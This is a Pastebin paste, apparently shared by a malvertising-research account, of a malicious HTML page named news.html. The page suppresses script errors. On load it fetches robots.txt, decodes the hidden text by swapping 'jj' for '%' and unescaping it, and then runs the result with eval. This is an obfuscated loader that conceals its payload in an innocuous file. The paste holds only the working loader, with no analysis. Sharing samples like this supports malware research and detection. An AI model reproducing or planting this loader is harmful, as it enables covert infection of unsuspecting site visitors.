Advertisement
StopMalvertising

news.html

Jan 4th, 2013
350
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.96 KB | None | 0 0
  1. <!doctype html>
  2. <html>
  3. <head>
  4.  
  5. <script language="JavaScript">
  6. <!--
  7.  
  8. function SymError()
  9. {
  10. return true;
  11. }
  12.  
  13. window.onerror = SymError;
  14.  
  15. //-->
  16. </script>
  17.  
  18. <script>
  19. function ajax()
  20.  
  21. {
  22.  
  23. var xmlhttp_request = false;
  24.  
  25. try {
  26.  
  27. xmlhttp_request= new ActiveXObject('Msxml2.XMLHTTP');
  28.  
  29. } catch (e)
  30.  
  31. {
  32.  
  33. try {
  34.  
  35. xmlhttp_request= new ActiveXObject('Microsoft.XMLHTTP');
  36.  
  37. } catch (E) {
  38.  
  39. xmlhttp_request= null;
  40.  
  41. }
  42.  
  43. }
  44.  
  45. if (!xmlhttp_request && typeof XMLHttpRequest != 'undefined')
  46.  
  47. {
  48.  
  49. xmlhttp_request= new XMLHttpRequest();
  50.  
  51. }
  52.  
  53. return xmlhttp_request;
  54.  
  55. }
  56. function loader()
  57. {
  58. var xmlhttp = ajax();
  59. xmlhttp.open('get', 'robots.txt', false);
  60. xmlhttp.send();
  61. var page = xmlhttp.responseText;
  62. page=page.replace(/jj/g,"%");
  63. code=unescape(page);
  64. return code;
  65. }
  66.  
  67. function load()
  68. {
  69. eval(loader());
  70. }
  71. </script>
  72. </head>
  73. <body onload="load()">
  74. <form id="a">
  75. </form>
  76. <dfn id="b">
  77. </dfn>
  78. </body>
  79. </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement